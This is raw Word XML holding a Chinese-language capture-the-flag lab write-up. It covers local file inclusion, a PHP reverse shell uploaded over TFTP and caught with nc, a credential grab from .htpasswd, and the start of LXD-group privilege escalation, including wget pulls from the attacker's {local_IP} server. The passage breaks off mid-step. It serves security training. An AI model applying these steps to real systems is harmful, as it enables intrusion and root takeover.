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796CB" w14:textId="2FA23342" w:rsidR="00DE428D" w:rsidRDefault="00DE428D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个靶场主要练习local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>inclusion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞，其主要作用是允许攻击者执行任意命令，通常由于错误配置服务器导致应用程序使用文件路径作为输入，攻击者则可以在包含语句中使用本地文件来获取shell</w:t>
      </w:r>
      <w:r w:rsidR="00603643">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00603643">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从标题文件路径入手可以使用/</w:t>
      </w:r>
      <w:r w:rsidR="00603643">
        <w:t>etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="00603643">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/尝试</w:t>
      </w:r>
      <w:r w:rsidR="00972E9C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功得到用户列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CB455E" w14:textId="77777777" w:rsidR="00DE428D" w:rsidRDefault="00DE428D"/>
    <w:p w14:paraId="25FD2BE3" w14:textId="77777777" w:rsidR="00DE428D" w:rsidRDefault="00DE428D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0376BC6A" wp14:editId="7D26E08E">
            <wp:extent cx="3924300" cy="7429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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3924300" cy="742950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD59F50" w14:textId="77777777" w:rsidR="00DE428D" w:rsidRDefault="00DE428D"/>
    <w:p w14:paraId="454E3E02" w14:textId="77777777" w:rsidR="00603643" w:rsidRDefault="00603643">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过题目得知要进行目标的U</w:t>
      </w:r>
      <w:r>
        <w:t>DP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1B798F" w14:textId="4D8E48FA" w:rsidR="00603643" w:rsidRDefault="00603643">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常规nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">很慢 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加上 -vv提速 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4823D6B7" w14:textId="77777777" w:rsidR="00603643" w:rsidRDefault="00603643"/>
    <w:p w14:paraId="6C32F90A" w14:textId="77777777" w:rsidR="00603643" w:rsidRDefault="00603643">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常还可以使用gobuster和nikto看看常规服务和使用的网页版本号等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13661E98" w14:textId="7C952B43" w:rsidR="002D1F0A" w:rsidRDefault="00603643">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>earchspolit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用版本可以查看已知的漏洞等信息</w:t>
      </w:r>
      <w:r w:rsidR="00DE428D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A9A3B4" w14:textId="63F9D554" w:rsidR="00972E9C" w:rsidRDefault="00972E9C"/>
    <w:p w14:paraId="0279E66A" w14:textId="3F8C9E09" w:rsidR="00972E9C" w:rsidRDefault="00972E9C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45283AE8" wp14:editId="417EFBBF">
            <wp:extent cx="5731510" cy="1365885"/>
            <wp:effectExtent l="0" t="0" r="254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731510" cy="1365885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10979C55" w14:textId="5F066426" w:rsidR="00972E9C" w:rsidRDefault="00972E9C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看出有用户mike</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133CFCB8" w14:textId="25B7DC70" w:rsidR="00476B12" w:rsidRDefault="00476B12"/>
    <w:p w14:paraId="19907401" w14:textId="6CC18CA5" w:rsidR="00476B12" w:rsidRDefault="00476B12">
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>oogle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lfi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>highon</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>coffee可以查一些cheatsheet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到可能存在的php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D8895" w14:textId="4DBA15CF" w:rsidR="00476B12" w:rsidRDefault="00476B12">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在highon.</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>offee</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以找到php</w:t>
      </w:r>
      <w:r>
        <w:t>://fillter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帮助我们把原网页的php原文以base</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的形式返回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E3752C" w14:textId="37E71055" w:rsidR="00476B12" w:rsidRDefault="00476B12">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再通过解密base</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到原php代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366A69CA" w14:textId="45E2B79F" w:rsidR="00476B12" w:rsidRDefault="00476B12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D803A98" wp14:editId="0B548E46">
            <wp:extent cx="4733925" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="9525"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4733925" cy="1304925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AB1E56" w14:textId="0E1E9494" w:rsidR="00476B12" w:rsidRDefault="00476B12"/>
    <w:p w14:paraId="4636BB45" w14:textId="7DCB5820" w:rsidR="00935C6D" w:rsidRDefault="00935C6D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果网站存在本地文件包含漏洞一般可以尝试是否包含远程文件包含漏洞，通过访问本地的webshell并再本地起一个监听来获得反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177CC992" w14:textId="294D9FF6" w:rsidR="00935C6D" w:rsidRPr="00935C6D" w:rsidRDefault="00935C6D"/>
    <w:p w14:paraId="21FE7A82" w14:textId="340D813C" w:rsidR="00935C6D" w:rsidRDefault="00935C6D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本靶场没有远程文件包含漏洞 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此得手动上传webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BAE27A" w14:textId="77777777" w:rsidR="00935C6D" w:rsidRDefault="00935C6D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过扫描结果得知这次靶场存在的TFTP简单文件传输协议 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个没有安全性能的FTP协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E1E64" w14:textId="77777777" w:rsidR="00986646" w:rsidRDefault="00935C6D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>他是用U</w:t>
      </w:r>
      <w:r>
        <w:t>DP 69</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口号 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无验证和加密机制</w:t>
      </w:r>
      <w:r w:rsidR="00986646">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A18606" w14:textId="77777777" w:rsidR="00986646" w:rsidRDefault="00986646">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此我们用过tftp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机ip链接 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过google得知tftp的默认文件路径是/</w:t>
      </w:r>
      <w:r>
        <w:t>var/lib/tftpboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E4DFC1" w14:textId="77777777" w:rsidR="00986646" w:rsidRDefault="00986646">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地起一个nc端口监听获取反弹shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再通过使用put</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传我们的反弹shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608855D9" w14:textId="77777777" w:rsidR="00986646" w:rsidRDefault="00986646">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功拿到shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C71D7B" w14:textId="77777777" w:rsidR="004744EA" w:rsidRDefault="00986646">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>拿到shell后第一时间升级shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D57CA" w14:textId="77777777" w:rsidR="004744EA" w:rsidRDefault="004744EA">
      <w:r w:rsidRPr="004744EA">
        <w:t xml:space="preserve">python3 -c 'import pty;pty.spawn("/bin/bash")'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193772BF" w14:textId="77777777" w:rsidR="004744EA" w:rsidRDefault="004744EA"/>
    <w:p w14:paraId="652F4333" w14:textId="77777777" w:rsidR="00312C87" w:rsidRDefault="004744EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>who</w:t>
      </w:r>
      <w:r>
        <w:t>ami</w:t>
      </w:r>
      <w:r w:rsidR="00312C87">
        <w:t xml:space="preserve">  ls -la</w:t>
      </w:r>
      <w:r w:rsidR="00312C87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看文件 </w:t>
      </w:r>
      <w:r w:rsidR="00312C87">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00312C87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到一个.</w:t>
      </w:r>
      <w:r w:rsidR="00312C87">
        <w:t>htpasswd</w:t>
      </w:r>
      <w:r w:rsidR="00312C87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件内含了用户mike的账户密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457133AE" w14:textId="77777777" w:rsidR="00312C87" w:rsidRDefault="00312C87">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mike切换到mike账户获得userflag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FCB078" w14:textId="77777777" w:rsidR="00312C87" w:rsidRDefault="00312C87"/>
    <w:p w14:paraId="5DF2B240" w14:textId="0D703DF3" w:rsidR="00312C87" w:rsidRDefault="00312C87">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该目标靶场还将讨论一个linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>group</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LXD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的漏洞 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为已知用户mike的用户组为lxd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26053C44" w14:textId="4D6AB0A7" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1107D515" wp14:editId="4232E815">
            <wp:extent cx="5731510" cy="3039745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3039745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0523A62E" w14:textId="7645749F" w:rsidR="00935C6D" w:rsidRDefault="00DC1FDF">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="005C1474">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/zlgxzswjy/p/14790554.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中文提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751485C5" w14:textId="57D7E938" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF"/>
    <w:p w14:paraId="111AE0F0" w14:textId="6197EFCC" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="005C1474">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.hackingarticles.in/lxd-privilege-escalation/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>英文提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD73EA7" w14:textId="088B4278" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF"/>
    <w:p w14:paraId="02266DA3" w14:textId="77777777" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装所需要的工：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD182F" w14:textId="1748C2AF" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF">
      <w:r w:rsidRPr="00DC1FDF">
        <w:t>sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575E4B0D" w14:textId="7FF28C80" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A70AFF6" w14:textId="77777777" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF">
      <w:r>
        <w:t>git clone https://github.com/lxc/distrobuilder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B4C61" w14:textId="77777777" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF">
      <w:r>
        <w:t>cd distrobuilder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C634B1" w14:textId="258FF051" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF">
      <w:r>
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E032C85" w14:textId="7ACF9CAA" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF"/>
    <w:p w14:paraId="41C894EF" w14:textId="77777777" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF">
      <w:r>
        <w:t>mkdir -p $HOME/ContainerImages/alpine/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47067A5A" w14:textId="77777777" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF">
      <w:r>
        <w:t>cd $HOME/ContainerImages/alpine/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E90AD41" w14:textId="77777777" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF">
      <w:r>
        <w:t>wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BA285D" w14:textId="1704FD71" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF">
      <w:r>
        <w:t>sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357BA41B" w14:textId="6353614B" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF"/>
    <w:p w14:paraId="10C87103" w14:textId="6A7E2AC1" w:rsidR="00DC1FDF" w:rsidRDefault="00DC1FDF" w:rsidP="00DC1FDF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随后我们会得到lxd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.tar.xz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和rootfs</w:t>
      </w:r>
      <w:r>
        <w:t>.squashfs</w:t>
      </w:r>
      <w:r w:rsidR="00AB6A7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB6A7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B1465" w14:textId="0545D18F" w:rsidR="00AB6A7D" w:rsidRDefault="00AB6A7D" w:rsidP="00DC1FDF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启动 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6A7D">
        <w:t>python3 -m http.server 8000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http服务来传送文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F10C74" w14:textId="74E53009" w:rsidR="00AB6A7D" w:rsidRDefault="00AB6A7D" w:rsidP="00DC1FDF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过反弹shell来执行wget获取两个文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3359F6" w14:textId="77777777" w:rsidR="00AB6A7D" w:rsidRDefault="00AB6A7D" w:rsidP="00AB6A7D">
      <w:r>
        <w:t>wget http://{local_IP}:8000/lxd.tar.xz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1770D22B" w14:textId="7AA24CF5" w:rsidR="00AB6A7D" w:rsidRDefault="00AB6A7D" w:rsidP="00AB6A7D">
      <w:r>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="005C1474">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://{local_IP}:8000/rootfs.squashfs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25817D88" w14:textId="37EEC5E2" w:rsidR="00AB6A7D" w:rsidRDefault="00AB6A7D" w:rsidP="00AB6A7D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>上传成功后将import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2A43CE" w14:textId="19432306" w:rsidR="00AB6A7D" w:rsidRDefault="00AB6A7D" w:rsidP="00AB6A7D">
      <w:r w:rsidRPr="00AB6A7D">
        <w:t>lxc image import lxd.tar.xz rootfs.squashfs --alias alpine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA360C4" w14:textId="79C412E5" w:rsidR="00AB6A7D" w:rsidRDefault="00AB6A7D" w:rsidP="00AB6A7D"/>
    <w:p w14:paraId="7215D745" w14:textId="2D74DA60" w:rsidR="00AB6A7D" w:rsidRDefault="00AB6A7D" w:rsidP="00AB6A7D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过lxc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>image</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list可以看到</w:t>
      </w:r>
      <w:r w:rsidR="00335055">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Al</w:t>
      </w:r>
      <w:r w:rsidR="00335055">
        <w:t>pine</w:t>
      </w:r>
      <w:r w:rsidR="00335055">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经在image</w:t>
      </w:r>
      <w:r w:rsidR="00335055">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00335055">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list中并且</w:t>
      </w:r>
      <w:r w:rsidR="00335055">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>security为false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EA602D" w14:textId="0A1A8365" w:rsidR="00335055" w:rsidRDefault="00335055" w:rsidP="00AB6A7D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们需要把security.</w:t>
      </w:r>
